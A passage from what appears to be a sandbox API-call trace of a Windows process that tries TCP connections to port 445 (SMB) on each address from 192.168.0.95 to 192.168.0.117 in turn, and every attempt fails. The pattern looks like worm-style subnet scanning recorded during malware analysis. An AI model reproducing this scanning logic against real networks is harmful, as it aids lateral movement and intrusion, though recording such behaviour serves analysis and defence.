readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0217.055] __WSAFDIsSet (param_1=0x674, param_2=0x36ef368) returned 0 [0217.055] GetLastError () returned 0x0 [0217.055] SetLastError (dwErrCode=0x0) [0217.055] GetLastError () returned 0x0 [0217.055] SetLastError (dwErrCode=0x0) [0217.055] htonl (hostlong=0xc0a8005f) returned 0x5f00a8c0 [0217.055] inet_ntoa (in=0x5f00a8c0) returned="192.168.0.95" [0217.055] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0217.055] socket (af=2, type=1, protocol=6) returned 0x680 [0217.055] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0217.055] htons (hostshort=0x1bd) returned 0xbd01 [0217.055] ioctlsocket (in: s=0x680, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0217.055] connect (s=0x680, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.95"), namelen=16) returned -1 [0217.055] ioctlsocket (in: s=0x680, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0217.055] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0218.067] __WSAFDIsSet (param_1=0x680, param_2=0x36ef368) returned 0 [0218.067] GetLastError () returned 0x0 [0218.067] SetLastError (dwErrCode=0x0) [0218.067] GetLastError () returned 0x0 [0218.067] SetLastError (dwErrCode=0x0) [0218.067] htonl (hostlong=0xc0a80060) returned 0x6000a8c0 [0218.067] inet_ntoa (in=0x6000a8c0) returned="192.168.0.96" [0218.067] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0218.067] socket (af=2, type=1, protocol=6) returned 0x684 [0218.068] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0218.068] htons (hostshort=0x1bd) returned 0xbd01 [0218.068] ioctlsocket (in: s=0x684, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0218.068] connect (s=0x684, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.96"), namelen=16) returned -1 [0218.070] ioctlsocket (in: s=0x684, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0218.070] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0219.081] __WSAFDIsSet (param_1=0x684, param_2=0x36ef368) returned 0 [0219.081] GetLastError () returned 0x0 [0219.081] SetLastError (dwErrCode=0x0) [0219.081] GetLastError () returned 0x0 [0219.081] SetLastError (dwErrCode=0x0) [0219.081] htonl (hostlong=0xc0a80061) returned 0x6100a8c0 [0219.081] inet_ntoa (in=0x6100a8c0) returned="192.168.0.97" [0219.081] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0219.081] socket (af=2, type=1, protocol=6) returned 0x68c [0219.082] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0219.082] htons (hostshort=0x1bd) returned 0xbd01 [0219.082] ioctlsocket (in: s=0x68c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0219.082] connect (s=0x68c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.97"), namelen=16) returned -1 [0219.082] ioctlsocket (in: s=0x68c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0219.082] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0220.097] __WSAFDIsSet (param_1=0x68c, param_2=0x36ef368) returned 0 [0220.097] GetLastError () returned 0x0 [0220.097] SetLastError (dwErrCode=0x0) [0220.097] GetLastError () returned 0x0 [0220.097] SetLastError (dwErrCode=0x0) [0220.097] htonl (hostlong=0xc0a80062) returned 0x6200a8c0 [0220.097] inet_ntoa (in=0x6200a8c0) returned="192.168.0.98" [0220.097] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0220.097] socket (af=2, type=1, protocol=6) returned 0x624 [0220.097] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0220.097] htons (hostshort=0x1bd) returned 0xbd01 [0220.097] ioctlsocket (in: s=0x624, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0220.097] connect (s=0x624, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.98"), namelen=16) returned -1 [0220.097] ioctlsocket (in: s=0x624, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0220.097] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0221.109] __WSAFDIsSet (param_1=0x624, param_2=0x36ef368) returned 0 [0221.109] GetLastError () returned 0x0 [0221.109] SetLastError (dwErrCode=0x0) [0221.109] GetLastError () returned 0x0 [0221.109] SetLastError (dwErrCode=0x0) [0221.109] htonl (hostlong=0xc0a80063) returned 0x6300a8c0 [0221.109] inet_ntoa (in=0x6300a8c0) returned="192.168.0.99" [0221.109] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0221.110] socket (af=2, type=1, protocol=6) returned 0x698 [0221.110] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0221.110] htons (hostshort=0x1bd) returned 0xbd01 [0221.110] ioctlsocket (in: s=0x698, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0221.110] connect (s=0x698, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.99"), namelen=16) returned -1 [0221.110] ioctlsocket (in: s=0x698, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0221.110] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0222.128] __WSAFDIsSet (param_1=0x698, param_2=0x36ef368) returned 0 [0222.128] GetLastError () returned 0x0 [0222.128] SetLastError (dwErrCode=0x0) [0222.128] GetLastError () returned 0x0 [0222.128] SetLastError (dwErrCode=0x0) [0222.128] htonl (hostlong=0xc0a80064) returned 0x6400a8c0 [0222.128] inet_ntoa (in=0x6400a8c0) returned="192.168.0.100" [0222.128] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0222.128] socket (af=2, type=1, protocol=6) returned 0x6ac [0222.128] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0222.128] htons (hostshort=0x1bd) returned 0xbd01 [0222.128] ioctlsocket (in: s=0x6ac, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0222.128] connect (s=0x6ac, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.100"), namelen=16) returned -1 [0222.129] ioctlsocket (in: s=0x6ac, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0222.129] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0223.137] __WSAFDIsSet (param_1=0x6ac, param_2=0x36ef368) returned 0 [0223.137] GetLastError () returned 0x0 [0223.137] SetLastError (dwErrCode=0x0) [0223.137] GetLastError () returned 0x0 [0223.137] SetLastError (dwErrCode=0x0) [0223.137] htonl (hostlong=0xc0a80065) returned 0x6500a8c0 [0223.137] inet_ntoa (in=0x6500a8c0) returned="192.168.0.101" [0223.137] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0223.137] socket (af=2, type=1, protocol=6) returned 0x6b0 [0223.138] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0223.138] htons (hostshort=0x1bd) returned 0xbd01 [0223.138] ioctlsocket (in: s=0x6b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0223.138] connect (s=0x6b0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.101"), namelen=16) returned -1 [0223.138] ioctlsocket (in: s=0x6b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0223.138] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0224.153] __WSAFDIsSet (param_1=0x6b0, param_2=0x36ef368) returned 0 [0224.153] GetLastError () returned 0x0 [0224.153] SetLastError (dwErrCode=0x0) [0224.153] GetLastError () returned 0x0 [0224.153] SetLastError (dwErrCode=0x0) [0224.153] htonl (hostlong=0xc0a80066) returned 0x6600a8c0 [0224.153] inet_ntoa (in=0x6600a8c0) returned="192.168.0.102" [0224.153] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0224.153] socket (af=2, type=1, protocol=6) returned 0x6bc [0224.153] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0224.154] htons (hostshort=0x1bd) returned 0xbd01 [0224.154] ioctlsocket (in: s=0x6bc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0224.154] connect (s=0x6bc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.102"), namelen=16) returned -1 [0224.154] ioctlsocket (in: s=0x6bc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0224.154] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0225.165] __WSAFDIsSet (param_1=0x6bc, param_2=0x36ef368) returned 0 [0225.165] GetLastError () returned 0x0 [0225.165] SetLastError (dwErrCode=0x0) [0225.165] GetLastError () returned 0x0 [0225.165] SetLastError (dwErrCode=0x0) [0225.165] htonl (hostlong=0xc0a80067) returned 0x6700a8c0 [0225.165] inet_ntoa (in=0x6700a8c0) returned="192.168.0.103" [0225.165] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0225.165] socket (af=2, type=1, protocol=6) returned 0x6a4 [0225.166] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0225.166] htons (hostshort=0x1bd) returned 0xbd01 [0225.166] ioctlsocket (in: s=0x6a4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0225.166] connect (s=0x6a4, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.103"), namelen=16) returned -1 [0225.166] ioctlsocket (in: s=0x6a4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0225.166] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0226.181] __WSAFDIsSet (param_1=0x6a4, param_2=0x36ef368) returned 0 [0226.181] GetLastError () returned 0x0 [0226.181] SetLastError (dwErrCode=0x0) [0226.181] GetLastError () returned 0x0 [0226.181] SetLastError (dwErrCode=0x0) [0226.181] htonl (hostlong=0xc0a80068) returned 0x6800a8c0 [0226.181] inet_ntoa (in=0x6800a8c0) returned="192.168.0.104" [0226.181] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0226.181] socket (af=2, type=1, protocol=6) returned 0x6a0 [0226.181] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0226.181] htons (hostshort=0x1bd) returned 0xbd01 [0226.181] ioctlsocket (in: s=0x6a0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0226.181] connect (s=0x6a0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.104"), namelen=16) returned -1 [0226.181] ioctlsocket (in: s=0x6a0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0226.181] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0227.193] __WSAFDIsSet (param_1=0x6a0, param_2=0x36ef368) returned 0 [0227.193] GetLastError () returned 0x0 [0227.193] SetLastError (dwErrCode=0x0) [0227.193] GetLastError () returned 0x0 [0227.193] SetLastError (dwErrCode=0x0) [0227.193] htonl (hostlong=0xc0a80069) returned 0x6900a8c0 [0227.193] inet_ntoa (in=0x6900a8c0) returned="192.168.0.105" [0227.193] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0227.193] socket (af=2, type=1, protocol=6) returned 0x6c8 [0227.193] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0227.193] htons (hostshort=0x1bd) returned 0xbd01 [0227.194] ioctlsocket (in: s=0x6c8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0227.194] connect (s=0x6c8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.105"), namelen=16) returned -1 [0227.194] ioctlsocket (in: s=0x6c8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0227.194] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0228.208] __WSAFDIsSet (param_1=0x6c8, param_2=0x36ef368) returned 0 [0228.208] GetLastError () returned 0x0 [0228.209] SetLastError (dwErrCode=0x0) [0228.209] GetLastError () returned 0x0 [0228.209] SetLastError (dwErrCode=0x0) [0228.209] htonl (hostlong=0xc0a8006a) returned 0x6a00a8c0 [0228.209] inet_ntoa (in=0x6a00a8c0) returned="192.168.0.106" [0228.209] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0228.209] socket (af=2, type=1, protocol=6) returned 0x6dc [0228.209] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0228.209] htons (hostshort=0x1bd) returned 0xbd01 [0228.209] ioctlsocket (in: s=0x6dc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0228.209] connect (s=0x6dc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.106"), namelen=16) returned -1 [0228.209] ioctlsocket (in: s=0x6dc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0228.209] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0229.221] __WSAFDIsSet (param_1=0x6dc, param_2=0x36ef368) returned 0 [0229.221] GetLastError () returned 0x0 [0229.221] SetLastError (dwErrCode=0x0) [0229.221] GetLastError () returned 0x0 [0229.221] SetLastError (dwErrCode=0x0) [0229.221] htonl (hostlong=0xc0a8006b) returned 0x6b00a8c0 [0229.221] inet_ntoa (in=0x6b00a8c0) returned="192.168.0.107" [0229.221] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0229.221] socket (af=2, type=1, protocol=6) returned 0x6e0 [0229.222] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0229.222] htons (hostshort=0x1bd) returned 0xbd01 [0229.222] ioctlsocket (in: s=0x6e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0229.222] connect (s=0x6e0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.107"), namelen=16) returned -1 [0229.222] ioctlsocket (in: s=0x6e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0229.222] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0230.237] __WSAFDIsSet (param_1=0x6e0, param_2=0x36ef368) returned 0 [0230.237] GetLastError () returned 0x0 [0230.237] SetLastError (dwErrCode=0x0) [0230.237] GetLastError () returned 0x0 [0230.237] SetLastError (dwErrCode=0x0) [0230.237] htonl (hostlong=0xc0a8006c) returned 0x6c00a8c0 [0230.237] inet_ntoa (in=0x6c00a8c0) returned="192.168.0.108" [0230.237] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0230.237] socket (af=2, type=1, protocol=6) returned 0x6ec [0230.237] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0230.237] htons (hostshort=0x1bd) returned 0xbd01 [0230.237] ioctlsocket (in: s=0x6ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0230.237] connect (s=0x6ec, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.108"), namelen=16) returned -1 [0230.237] ioctlsocket (in: s=0x6ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0230.237] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0231.250] __WSAFDIsSet (param_1=0x6ec, param_2=0x36ef368) returned 0 [0231.250] GetLastError () returned 0x0 [0231.250] SetLastError (dwErrCode=0x0) [0231.250] GetLastError () returned 0x0 [0231.250] SetLastError (dwErrCode=0x0) [0231.250] htonl (hostlong=0xc0a8006d) returned 0x6d00a8c0 [0231.250] inet_ntoa (in=0x6d00a8c0) returned="192.168.0.109" [0231.250] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0231.250] socket (af=2, type=1, protocol=6) returned 0x6f0 [0231.250] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0231.250] htons (hostshort=0x1bd) returned 0xbd01 [0231.250] ioctlsocket (in: s=0x6f0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0231.250] connect (s=0x6f0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.109"), namelen=16) returned -1 [0231.251] ioctlsocket (in: s=0x6f0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0231.251] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0232.264] __WSAFDIsSet (param_1=0x6f0, param_2=0x36ef368) returned 0 [0232.264] GetLastError () returned 0x0 [0232.264] SetLastError (dwErrCode=0x0) [0232.264] GetLastError () returned 0x0 [0232.264] SetLastError (dwErrCode=0x0) [0232.265] htonl (hostlong=0xc0a8006e) returned 0x6e00a8c0 [0232.265] inet_ntoa (in=0x6e00a8c0) returned="192.168.0.110" [0232.265] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0232.265] socket (af=2, type=1, protocol=6) returned 0x6fc [0232.265] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0232.265] htons (hostshort=0x1bd) returned 0xbd01 [0232.265] ioctlsocket (in: s=0x6fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0232.265] connect (s=0x6fc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.110"), namelen=16) returned -1 [0232.265] ioctlsocket (in: s=0x6fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0232.265] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0233.278] __WSAFDIsSet (param_1=0x6fc, param_2=0x36ef368) returned 0 [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] htonl (hostlong=0xc0a8006f) returned 0x6f00a8c0 [0233.278] inet_ntoa (in=0x6f00a8c0) returned="192.168.0.111" [0233.278] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0233.278] socket (af=2, type=1, protocol=6) returned 0x700 [0233.278] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0233.278] htons (hostshort=0x1bd) returned 0xbd01 [0233.278] ioctlsocket (in: s=0x700, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0233.278] connect (s=0x700, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.111"), namelen=16) returned -1 [0233.279] ioctlsocket (in: s=0x700, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0233.279] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0234.294] __WSAFDIsSet (param_1=0x700, param_2=0x36ef368) returned 0 [0234.294] GetLastError () returned 0x0 [0234.294] SetLastError (dwErrCode=0x0) [0234.294] GetLastError () returned 0x0 [0234.294] SetLastError (dwErrCode=0x0) [0234.294] htonl (hostlong=0xc0a80070) returned 0x7000a8c0 [0234.295] inet_ntoa (in=0x7000a8c0) returned="192.168.0.112" [0234.295] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0234.295] socket (af=2, type=1, protocol=6) returned 0x70c [0234.295] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0234.295] htons (hostshort=0x1bd) returned 0xbd01 [0234.295] ioctlsocket (in: s=0x70c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0234.295] connect (s=0x70c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.112"), namelen=16) returned -1 [0234.295] ioctlsocket (in: s=0x70c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0234.295] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0235.306] __WSAFDIsSet (param_1=0x70c, param_2=0x36ef368) returned 0 [0235.306] GetLastError () returned 0x0 [0235.306] SetLastError (dwErrCode=0x0) [0235.306] GetLastError () returned 0x0 [0235.306] SetLastError (dwErrCode=0x0) [0235.306] htonl (hostlong=0xc0a80071) returned 0x7100a8c0 [0235.306] inet_ntoa (in=0x7100a8c0) returned="192.168.0.113" [0235.306] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0235.306] socket (af=2, type=1, protocol=6) returned 0x710 [0235.306] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0235.306] htons (hostshort=0x1bd) returned 0xbd01 [0235.306] ioctlsocket (in: s=0x710, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0235.307] connect (s=0x710, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.113"), namelen=16) returned -1 [0235.307] ioctlsocket (in: s=0x710, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0235.307] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0236.322] __WSAFDIsSet (param_1=0x710, param_2=0x36ef368) returned 0 [0236.322] GetLastError () returned 0x0 [0236.322] SetLastError (dwErrCode=0x0) [0236.322] GetLastError () returned 0x0 [0236.322] SetLastError (dwErrCode=0x0) [0236.322] htonl (hostlong=0xc0a80072) returned 0x7200a8c0 [0236.322] inet_ntoa (in=0x7200a8c0) returned="192.168.0.114" [0236.322] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0236.322] socket (af=2, type=1, protocol=6) returned 0x71c [0236.323] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0236.323] htons (hostshort=0x1bd) returned 0xbd01 [0236.323] ioctlsocket (in: s=0x71c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0236.323] connect (s=0x71c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.114"), namelen=16) returned -1 [0236.323] ioctlsocket (in: s=0x71c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0236.323] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0237.333] __WSAFDIsSet (param_1=0x71c, param_2=0x36ef368) returned 0 [0237.333] GetLastError () returned 0x0 [0237.333] SetLastError (dwErrCode=0x0) [0237.333] GetLastError () returned 0x0 [0237.333] SetLastError (dwErrCode=0x0) [0237.333] htonl (hostlong=0xc0a80073) returned 0x7300a8c0 [0237.334] inet_ntoa (in=0x7300a8c0) returned="192.168.0.115" [0237.334] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0237.334] socket (af=2, type=1, protocol=6) returned 0x720 [0237.334] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0237.334] htons (hostshort=0x1bd) returned 0xbd01 [0237.334] ioctlsocket (in: s=0x720, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0237.334] connect (s=0x720, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.115"), namelen=16) returned -1 [0237.335] ioctlsocket (in: s=0x720, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0237.335] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0238.349] __WSAFDIsSet (param_1=0x720, param_2=0x36ef368) returned 0 [0238.349] GetLastError () returned 0x0 [0238.349] SetLastError (dwErrCode=0x0) [0238.349] GetLastError () returned 0x0 [0238.349] SetLastError (dwErrCode=0x0) [0238.349] htonl (hostlong=0xc0a80074) returned 0x7400a8c0 [0238.349] inet_ntoa (in=0x7400a8c0) returned="192.168.0.116" [0238.349] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0238.349] socket (af=2, type=1, protocol=6) returned 0x72c [0238.349] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0238.349] htons (hostshort=0x1bd) returned 0xbd01 [0238.349] ioctlsocket (in: s=0x72c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0238.350] connect (s=0x72c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.116"), namelen=16) returned -1 [0238.350] ioctlsocket (in: s=0x72c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0238.350] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0239.424] __WSAFDIsSet (param_1=0x72c, param_2=0x36ef368) returned 0 [0239.425] GetLastError () returned 0x0 [0239.425] SetLastError (dwErrCode=0x0) [0239.425] GetLastError () returned 0x0 [0239.425] SetLastError (dwErrCode=0x0) [0239.425] htonl (hostlong=0xc0a80075) returned 0x7500a8c0 [0239.425] inet_ntoa (in=0x7500a8c0) returned="192.168.0.117" [0239.425] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0239.425] socket (af=2, type=1, protocol=6) returned 0x730 [0239.425] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0239.425] htons (hostshort=0x1bd) returned 0xbd01 [0239.425] ioctlsocket (in: s=0x730, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0239.425] connect (s=0x730, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.117"), namelen=16) returned -1 [0239.426] ioctlsocket (in: s=0x730, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0239.426] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0240.440] __WSAFDIsSet 